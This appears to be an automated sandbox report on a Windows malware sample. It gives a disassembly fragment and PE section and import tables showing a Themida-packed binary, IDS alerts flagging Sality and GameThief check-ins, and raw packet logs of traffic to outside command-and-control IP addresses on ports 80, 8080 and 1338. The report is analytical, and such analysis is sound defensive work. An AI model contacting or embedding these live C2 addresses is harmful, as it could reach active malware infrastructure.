push 00067849h
xchg al, bl
pop eax
xor dl, 0000002Fh
xor eax, 000000F7h
jbe 00007FC16C7D7E64h
inc dh
push eax
jne 00007FC16C7D7E67h
movzx edx, ah
adc dh, dh
pop edi
test dl, ah
sub edi, 0006619Eh
jo 00007FC16C7D7E68h
sbb esi, 2AD4ACB8h
not esi
imul eax, ecx, 9633A69Dh
push edi
pop ecx
mov ebx, edx
mov ebp, 19D488F0h
sub ecx, 00000F3Ch
jbe 00007FC16C7D7E64h
test edi, edx
and eax, D4318ABFh
lea edi, dword ptr [0E488C85h]
imul ebx, edi
push FFF1181Ch
and ebx, edi
pop eax
mov ebp, 26EC9258h
add eax, 0000347Bh
cmp bl, ah
sub ecx, eax
xor edx, ebp
sub ecx, 000EB36Ah
test cl, cl
sub eax, EE2B72BFh
not bh
cmp ecx, 00000293h
jnc 00007FC16C7D7E20h
mov bl, 0000002Ah
push edx
test bl, FFFFFF94h
call 00007FC16C7D7E71h
imul esi, edx
or ah, 00000004h
cmp ecx, 00000000h
Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1606a | 0xa4 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x17000 | 0x7c4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0xa966 | 0xa000 | 93c2765494cdb57e37d20ee5e6dfa2c2 | False | 0.937841796875 | data | 7.775257437192022 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
 | 0xc000 | 0xfe6 | 0x1000 | acc4cc0c66765c699f6d99fb5fed9095 | False | 0.22998046875 | BS image, Version 22585, Quantization -3425, (Decompresses to -28229 words) | 2.338376164963073 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
 | 0xd000 | 0x705c | 0x2000 | 80f4797e10eaf24161df264a75b87dc2 | False | 0.5545654296875 | data | 5.309127524944744 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x15000 | 0x7c8 | 0x1000 | 5c952e60d7ddeb6332135be5a70ab42a | False | 0.21533203125 | data | 2.2384273092863376 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.idata | 0x16000 | 0x1000 | 0x1000 | c742d873ff98b7336e5a2c9ad6278917 | False | 0.040771484375 | data | 0.36307082483983155 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x17000 | 0x1000 | 0x1000 | cebf04513f50f39b683e511a0c303116 | False | 0.197265625 | data | 1.9576722479537187 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.themida | 0x18000 | 0x44c000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.boot | 0x464000 | 0x2c4000 | 0x2c4000 | 39a1e3f4d99c852b78a3f7706e53d49e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x17058 | 0x768 | data | English | United States | 0.40189873417721517
DLL | Import
kernel32.dll | GetModuleHandleA
MSVCRT.dll | _iob
ADVAPI32.dll | FreeSid
WSOCK32.dll | getsockopt
WS2_32.dll | WSARecv
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-18T09:38:17.050151+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.7 | 49731 | 185.53.178.50 | 80 | TCP
2024-10-18T09:38:17.050151+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.7 | 49731 | 185.53.178.50 | 80 | TCP
2024-10-18T09:38:21.240690+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.7 | 49737 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:21.240690+0200 | 2012736 | ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin | 1 | 192.168.2.7 | 49737 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:21.240690+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.7 | 49737 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:22.591417+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.7 | 49758 | 185.53.178.50 | 80 | TCP
2024-10-18T09:38:22.591417+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.7 | 49758 | 185.53.178.50 | 80 | TCP
2024-10-18T09:38:26.713691+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.7 | 49764 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:26.713691+0200 | 2012736 | ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin | 1 | 192.168.2.7 | 49764 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:26.713691+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.7 | 49764 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:28.058130+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.7 | 49783 | 185.53.178.50 | 80 | TCP
2024-10-18T09:38:28.058130+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.7 | 49783 | 185.53.178.50 | 80 | TCP
2024-10-18T09:38:32.076146+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.7 | 49790 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:32.076146+0200 | 2012736 | ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin | 1 | 192.168.2.7 | 49790 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:32.076146+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.7 | 49790 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:33.454309+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.7 | 49813 | 185.53.178.50 | 80 | TCP
2024-10-18T09:38:33.454309+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.7 | 49813 | 185.53.178.50 | 80 | TCP
2024-10-18T09:38:37.482585+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.7 | 49824 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:37.482585+0200 | 2012736 | ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin | 1 | 192.168.2.7 | 49824 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:37.482585+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.7 | 49824 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:38.799893+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.7 | 49845 | 185.53.178.50 | 80 | TCP
2024-10-18T09:38:38.799893+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.7 | 49845 | 185.53.178.50 | 80 | TCP
2024-10-18T09:38:42.849777+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.7 | 49851 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:42.849777+0200 | 2012736 | ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin | 1 | 192.168.2.7 | 49851 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:42.849777+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.7 | 49851 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:44.218274+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.7 | 49881 | 185.53.178.50 | 80 | TCP
2024-10-18T09:38:44.218274+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.7 | 49881 | 185.53.178.50 | 80 | TCP
2024-10-18T09:38:48.414602+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.7 | 49888 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:48.414602+0200 | 2012736 | ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin | 1 | 192.168.2.7 | 49888 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:48.414602+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.7 | 49888 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:49.758906+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.7 | 49913 | 185.53.178.50 | 80 | TCP
2024-10-18T09:38:49.758906+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.7 | 49913 | 185.53.178.50 | 80 | TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:53.779104+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749922190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:53.779104+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.749922190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:53.779104+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.749922190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:55.191539+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749943185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:55.191539+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.749943185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:59.200915+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762459190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:59.200915+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.762459190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:59.200915+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762459190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:00.500105+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762487185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:00.500105+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762487185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:04.530611+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762493190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:04.530611+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.762493190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:04.530611+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762493190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:06.749431+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762510185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:06.749431+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762510185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:10.778945+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762512190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:10.778945+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.762512190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:10.778945+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762512190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:12.134928+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762513185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:12.134928+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762513185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:16.194613+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762514190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:16.194613+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.762514190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:16.194613+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762514190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:17.525520+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762516185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:17.525520+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762516185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:21.577260+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762517190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:21.577260+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.762517190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:21.577260+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762517190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:22.899604+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762518185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:22.899604+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762518185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:26.962883+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762519190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:26.962883+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.762519190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:26.962883+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762519190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:28.305192+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762521185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:28.305192+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762521185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:32.388529+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762522190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:32.388529+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.762522190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:32.388529+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762522190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:33.728702+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762524185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:33.728702+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762524185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:37.753556+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762525190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:37.753556+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.762525190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:37.753556+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762525190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:39.248321+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762526185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:39.248321+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762526185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:42.049055+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762527190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:42.049055+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.762527190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:42.049055+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762527190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:45.318935+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762528185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:45.318935+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762528185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:53.953751+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762529190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:53.953751+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.762529190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:53.953751+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762529190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:55.330024+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762530185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:55.330024+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762530185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:40:03.871177+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762531190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:40:03.871177+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.762531190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:40:03.871177+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762531190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:40:05.184315+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762532185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:40:05.184315+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762532185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:40:13.679122+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762533190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:40:13.679122+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.762533190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:40:13.679122+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762533190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:40:15.014967+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762534185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:40:15.014967+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762534185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:40:23.537013+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762535190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:40:23.537013+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.762535190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:40:23.537013+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762535190.120.227.918080TCP
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:22.591417074 CEST4975880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:22.591438055 CEST8049758185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:22.591449976 CEST8049758185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:22.591483116 CEST4975880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:22.591492891 CEST4975880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:22.591828108 CEST8049758185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:22.591881037 CEST4975880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:22.611561060 CEST497648080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:22.616466999 CEST808049764190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:22.616563082 CEST497648080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:22.619852066 CEST497648080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:22.624721050 CEST808049764190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:23.102139950 CEST133849725189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:23.102221966 CEST497251338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:23.112694979 CEST497251338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:23.117516994 CEST133849725189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:23.131225109 CEST497651338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:23.136113882 CEST133849765189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:23.136209011 CEST497651338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:26.713690996 CEST497648080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:26.953638077 CEST4975880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:26.954036951 CEST4978380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:26.975609064 CEST8049783185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:26.975619078 CEST8049758185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:26.975687981 CEST4978380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:26.975729942 CEST4975880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:26.999886990 CEST4978380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:27.005415916 CEST8049783185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:28.058017969 CEST8049783185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:28.058130026 CEST4978380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:28.058171988 CEST8049783185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:28.058183908 CEST8049783185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:28.058228970 CEST4978380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:28.058574915 CEST8049783185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:28.058618069 CEST4978380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:28.080173016 CEST497908080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:28.085294008 CEST808049790190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:28.085402012 CEST497908080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:28.088912964 CEST497908080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:28.093822002 CEST808049790190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.076145887 CEST497908080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.165900946 CEST133849765189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.166336060 CEST497651338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.166860104 CEST497651338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.166860104 CEST133849765189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.166932106 CEST497651338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.167891979 CEST133849765189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.167923927 CEST498121338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.168066978 CEST497651338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.173701048 CEST133849765189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.173722982 CEST133849812189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.173882008 CEST498121338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.297267914 CEST4978380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.298000097 CEST4981380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.302839994 CEST8049813185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.303198099 CEST4981380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.303198099 CEST4981380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.303236008 CEST8049783185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.303406000 CEST4978380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.308160067 CEST8049813185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:33.454242945 CEST8049813185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:33.454308987 CEST4981380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:33.454354048 CEST8049813185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:33.454370022 CEST8049813185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:33.454407930 CEST4981380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:33.454628944 CEST8049813185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:33.454667091 CEST4981380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:33.464095116 CEST498248080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:33.468995094 CEST808049824190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:33.469072104 CEST498248080192.168.2.7190.120.227.91
